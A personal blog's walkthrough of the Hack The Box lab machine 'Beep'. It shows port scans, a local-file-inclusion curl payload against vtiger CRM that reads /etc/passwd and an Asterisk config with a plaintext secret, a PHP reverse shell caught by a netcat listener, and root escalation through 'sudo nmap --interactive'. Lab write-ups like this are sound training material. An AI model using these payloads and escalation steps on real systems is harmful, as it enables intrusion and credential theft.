5 December 2022

Pentesting Fun Stuff

following the cyber security path…

BEEP

First a scan to get the open ports and services running.

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING EXPIRE(NEVER) STLS AUTH-RESP-CODE UIDL LOGIN-DELAY(0) APOP USER RESP-CODES TOP
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            743/udp  status
|_  100024  1            746/tcp  status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: OK Completed NO SORT NAMESPACE BINARY THREAD=REFERENCES MAILBOX-REFERRALS X-NETSCAPE CATENATE THREAD=ORDEREDSUBJECT LISTEXT LIST-SUBSCRIBED MULTIAPPEND RIGHTS=kxte STARTTLS URLAUTHA0001 RENAME ATOMIC ANNOTATEMORE IDLE UNSELECT IMAP4 CONDSTORE IMAP4rev1 CHILDREN UIDPLUS QUOTA SORT=MODSEQ ID ACL LITERAL+
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2018-06-21T12:15:07+00:00; -1h20m00s from scanner time.
746/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: mean: -1h20m00s, deviation: 0s, median: -1h20m00s

A lot of open ports. Let’s start with the webserver.

Webserver 10.10.10.7:443

Webserver 10.10.10.7:443/admin


root@n0w4n:~/opt/htb/beep# searchsploit elastix
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                                              | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                                            | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                                                      | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                                                   | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                                                  | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                                                 | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                                             | exploits/php/webapps/18650.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

After a quick lookup it looks like Elastix has some issues. Combining that with FreePBX I think I’m going to check out the python script first which should exploit a RCE vulnerability.
The python script needs a little tweaking with the hosts and it give the following description:

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

That shouldn’t be to hard.

Traceback (most recent call last):
  File "18650.py", line 27, in <module>
    urllib.urlopen(url)
  File "/usr/lib/python2.7/urllib.py", line 87, in urlopen
    return opener.open(url)
  File "/usr/lib/python2.7/urllib.py", line 213, in open
    return getattr(self, name)(url)
  File "/usr/lib/python2.7/urllib.py", line 443, in open_https
    h.endheaders(data)
  File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
    self.send(msg)
  File "/usr/lib/python2.7/httplib.py", line 844, in send
    self.connect()
  File "/usr/lib/python2.7/httplib.py", line 1263, in connect
    server_hostname=server_hostname)
  File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
    _context=self)
  File "/usr/lib/python2.7/ssl.py", line 617, in __init__
    self.do_handshake()
  File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
    self._sslobj.do_handshake()
IOError: [Errno socket error] [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)

It gives back an error. It looks like there are some problems with SSL. Some adjustments to the script:

import ssl
ssl._create_default_https_context = ssl._create_unverified_context

After the adjustment the script runs fine, but there is no shell. Time to scan for the known VOIP devices and get more info.

root@n0w4n:~/opt/htb/beep# svmap 10.10.10.7 -vv
DEBUG:root:started logging
DEBUG:root:parsing range of ports: 5060
DEBUG:DrinkOrSip:external ip was not set
INFO:DrinkOrSip:trying to get self ip .. might take a while
DEBUG:DrinkOrSip:External ip: 127.0.1.1:5060
DEBUG:DrinkOrSip:Compact mode: False
DEBUG:DrinkOrSip:From: sipvicious <sip:100@1.1.1.1>
INFO:root:start your engines
DEBUG:DrinkOrSip:binding to 0.0.0.0:5060
DEBUG:DrinkOrSip:sending packet to 10.10.10.7:5060
DEBUG:DrinkOrSip:packet: 'OPTIONS sip:100@10.10.10.7 SIP/2.0\r\nVia: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-2103700663;rport\r\nContent-Length: 0\r\nFrom: "sipvicious"<sip:100@1.1.1.1>;tag=3061306130613037313363340132353839373937383931\r\nAccept: application/sdp\r\nUser-Agent: friendly-scanner\r\nTo: "sipvicious"<sip:100@1.1.1.1>\r\nContact: sip:100@127.0.1.1:5060\r\nCSeq: 1 OPTIONS\r\nCall-ID: 851657692881764133361587\r\nMax-Forwards: 70\r\n\r\n'
DEBUG:DrinkOrSip:no more hosts to scan
DEBUG:DrinkOrSip:Making sure that no packets get lost
DEBUG:DrinkOrSip:Come to daddy
DEBUG:DrinkOrSip:running fingerPrintPacket()
DEBUG:DrinkOrSip:Fingerprint: disabled
DEBUG:DrinkOrSip:Uaname: FPBX-2.8.1(1.8.7.0)
INFO:DrinkOrSip:10.10.10.7:5060	->	10.10.10.7:5060	->	FPBX-2.8.1(1.8.7.0)	->	disabled
INFO:root:we have 1 devices
| SIP Device      | User Agent          | Fingerprint |
-------------------------------------------------------
| 10.10.10.7:5060 | FPBX-2.8.1(1.8.7.0) | disabled    |
INFO:root:Total time: 0:00:03.076845
root@n0w4n:~/opt/htb/beep# svwar -vv 10.10.10.7
DEBUG:root:started logging
DEBUG:TakeASip:external ip was not set
INFO:TakeASip:trying to get self ip .. might take a while
INFO:root:start your engines
DEBUG:TakeASip:binding to any:5060
ERROR:TakeASip:socket error: timed out
WARNING:root:found nothing
INFO:root:Total time: 0:00:03.160302

Looking at the output I could smack myself silly. The scripts try to bind with port 5060, which is the default port for SIP……..and it is closed…..from the beginning!
So it’s back to the initial port scan and check out what’s next.
I decide to get back to the webserver and run a dirsearch scan.

root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e php,txt -x 403,404
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt | Threads: 10 | Wordlist size: 141667
Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_10-38-22.log
Target: https://10.10.10.7
[10:38:22] Starting:
[10:38:23] 200 -    2KB - /
[10:38:24] 301 -  308B  - /help  ->  https://10.10.10.7/help/
[10:38:25] 301 -  310B  - /images  ->  https://10.10.10.7/images/
[10:38:53] 301 -  314B  - /recordings  ->  https://10.10.10.7/recordings/
[10:39:09] 301 -  309B  - /panel  ->  https://10.10.10.7/panel/
[10:40:07] 301 -  310B  - /static  ->  https://10.10.10.7/static/
[10:40:11] 301 -  310B  - /themes  ->  https://10.10.10.7/themes/
[10:40:31] 301 -  309B  - /admin  ->  https://10.10.10.7/admin/
[10:45:06] 301 -  308B  - /mail  ->  https://10.10.10.7/mail/
[10:45:11] 301 -  311B  - /modules  ->  https://10.10.10.7/modules/
[10:46:13] 301 -  308B  - /lang  ->  https://10.10.10.7/lang/
[10:49:12] 301 -  313B  - /vtigercrm  ->  https://10.10.10.7/vtigercrm/

root@n0w4n:~/opt/htb/beep# searchsploit vtiger crm
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)                                                                                | exploits/php/webapps/44379.rb
vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions                                                                                         | exploits/php/webapps/2508.txt
vTiger CRM 4.2 - SQL Injection                                                                                                                     | exploits/php/webapps/26586.txt
vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting                                                                                        | exploits/php/webapps/26584.txt
vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting                                                                                  | exploits/php/webapps/26585.txt
vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities                                                                                   | exploits/php/webapps/32307.txt
vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting                                | exploits/php/webapps/9450.txt
vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion                                                                                            | exploits/php/webapps/16280.py
vTiger CRM 5.1.0 - Local File Inclusion                                                                                                            | exploits/php/webapps/18770.txt
vTiger CRM 5.2 - 'onlyforuser' SQL Injection                                                                                                       | exploits/php/webapps/36208.txt
vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities                                                                     | exploits/php/webapps/36204.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)                                                                   | exploits/php/webapps/36203.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)                                                                   | exploits/php/webapps/36255.txt
vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion                                                                                       | exploits/php/webapps/35574.txt
vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting                                                                                        | exploits/php/webapps/35577.txt
vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)                                                                          | exploits/php/remote/29319.rb
vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection                                                                                           | exploits/php/webapps/28409.txt
vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)                                                                      | exploits/php/remote/30787.rb
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities                                                                                                   | exploits/php/webapps/27279.txt
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion                                                                               | exploits/php/webapps/32213.txt
vTiger CRM 6.3.0 - Authenticated Remote Code Execution                                                                                             | exploits/php/webapps/38345.txt
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Looks like version 5.1.0 has a LFI vulnerability.

 Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none
We have find this vulnerabilitie in VTiger 5.1.0
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php
Try this :
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

That’s easy to test.

root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash

Lets grab the first flag.

root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
aeff3def0c765c2677b94715cffa73ac

Because I don’t have the ability to search at my leisure in the file system, I’m going to look for interesting files for the programs I know are installed and to which I have access, like Asterisk (https://www.voip-info.org/asterisk-config-files/).

root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
;
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
displayconnects=no ;only effects 1.6+
[admin]
secret = jEhdIekWmdjE
deny=0.0.0.0/0.0.0.0
permit=127.0.0.1/255.255.255.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
#include manager_additional.conf
#include manager_custom.conf

After a few tries I get some credentials. With these credentials I have access to the dashboard of Elastix, FreePBX and vtigerCR
With vtigercrm there are a few possibilities to upload files. I go with changing the company logo.

For the uploading of the file I’ll use the php reverse shell script from pentestmonkey. After uploading the file I find the uploaded file in the /test/ folder.

root@n0w4n:~/opt/htb/beep# nc -lnvp 31337
listening on [any] 31337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.7] 58766
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 i686 i386 GNU/Linux
 12:55:40 up 2 days,  9:44,  0 users,  load average: 0.00, 0.06, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh: no job control in this shell
sh-3.2$ id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)

Now for root.

sh-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

There are some flag for nmap that requires root, like -sS, but for a restricted user this is not a normal choice. Also having nmap on root level gives great possibilities.

sh-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
nmap> waiting to reap child: No child processes (10)
!sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
cat root.txt
/bin/cat: line 1: bash:: command not found
/bin/cat: line 2: /etc/passwd:: No such file or directory
/bin/cat: line 3: /etc/passwd:: No such file or directory
/bin/cat: line 4: /etc/passwd:: No such file or directory
/bin/cat: line 5: /etc/passwd:: No such file or directory
/bin/cat: line 6: /etc/passwd:: No such file or directory
/bin/cat: line 7: /etc/passwd:: No such file or directory
/bin/cat: line 8: /etc/passwd:: No such file or directory
/bin/cat: line 9: /etc/passwd:: No such file or directory
/bin/cat: line 10: /etc/passwd:: No such file or directory
/bin/cat: line 11: /etc/passwd:: No such file or directory
/bin/cat: line 12: /etc/passwd:: No such file or directory
/bin/cat: line 13: /etc/passwd:: No such file or directory
/bin/cat: line 14: /etc/passwd:: No such file or directory
/bin/cat: line 15: /etc/passwd:: No such file or directory
/bin/cat: line 16: /etc/passwd:: No such file or directory
/bin/cat: line 17: /etc/passwd:: No such file or directory
/bin/cat: line 18: /etc/passwd:: No such file or directory
/bin/cat: line 19: /etc/passwd:: No such file or directory
/bin/cat: line 20: /etc/passwd:: No such file or directory
/bin/cat: line 21: /etc/passwd:: No such file or directory
/bin/cat: line 22: /etc/passwd:: No such file or directory
/bin/cat: line 23: /etc/passwd:: No such file or directory
/bin/cat: line 24: /etc/passwd:: No such file or directory
/bin/cat: line 25: /etc/passwd:: No such file or directory
/bin/cat: line 26: /etc/passwd:: No such file or directory
/bin/cat: line 27: /etc/passwd:: No such file or directory
/bin/cat: line 28: /etc/passwd:: No such file or directory
/bin/cat: line 29: /etc/passwd:: No such file or directory
/bin/cat: line 30: /etc/passwd:: No such file or directory
/bin/cat: line 31: /etc/passwd:: No such file or directory
/bin/cat: line 32: /etc/passwd:: No such file or directory
/bin/cat: line 33: /etc/passwd:: No such file or directory
/bin/cat: line 34: /etc/passwd:: No such file or directory
/bin/cat: line 35: /etc/passwd:: No such file or directory
/bin/cat: line 36: /etc/passwd:: No such file or directory

No /bin/cat? LOL….funny….but no problem.

tac root.txt | tac
d88e006123842106982acce0aaf453f0

And it’s done!!!

2 thoughts on “BEEP

  1. Hi!
    Thanks for this doc, very well done!
    I have a question 🙂
    Which reverse shell did you upload on vtigercrm? I’m blocked at this point since 2 days 🙁
    I uploaded a php reverse shell changing the extension to .php;.jpg in order to pass the sanity for the file. But then I cannot trigger the reverse shell.
    Any help?
    Thanks

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.